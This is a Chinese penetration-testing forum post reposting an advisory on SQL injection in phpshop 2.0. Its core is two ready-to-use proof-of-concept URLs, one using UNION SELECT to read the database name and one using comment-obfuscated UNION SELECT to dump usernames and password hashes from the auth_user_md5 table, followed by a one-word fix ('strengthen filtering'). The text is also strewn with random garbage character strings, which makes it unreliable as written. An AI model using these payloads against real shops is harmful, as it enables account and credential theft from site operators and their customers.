找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshop 2.0 SQL注入及修复
返回列表 发新帖
查看: 2735|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
, |% U2 u; t; d0 S* P- @2 I
$ l) d$ F# p. J! Z作者 : By onestree, F' Y# F8 R. x1 u7 a  P2 Y+ M
下载地址 : http://code.google.com/p/phpshop/downloads/list
" T6 S$ O# g4 D测试地址: windows 7 / ubuntu$ r, D4 p) J( k5 ]8 x" z5 R) p
3 e& M3 X# @" }7 |
# p1 ?4 y  \( p8 @+ a+ o
SQLi p0c:
8 Q) q- l2 j2 _: b  _3 u 0 M4 p' m% }5 M: F/ u& ~; C; z
==================
* r/ W( @+ k' x
- _" g# J% e6 ehttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
: k  `* \0 p( R* I7 Funion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --! ?0 Y" g% g8 n
+ J' b( s  g4 A
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--3 g- ^# c, X8 Z- N" i

  c! @  m) }8 Q8 r; ^修复:
$ ^) {2 B8 [9 n6 s# h0 j5 i加强过滤
* i8 M3 j6 c" H; K6 `! z; _; b, Q; Q2 }
; n' G+ A. y. t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表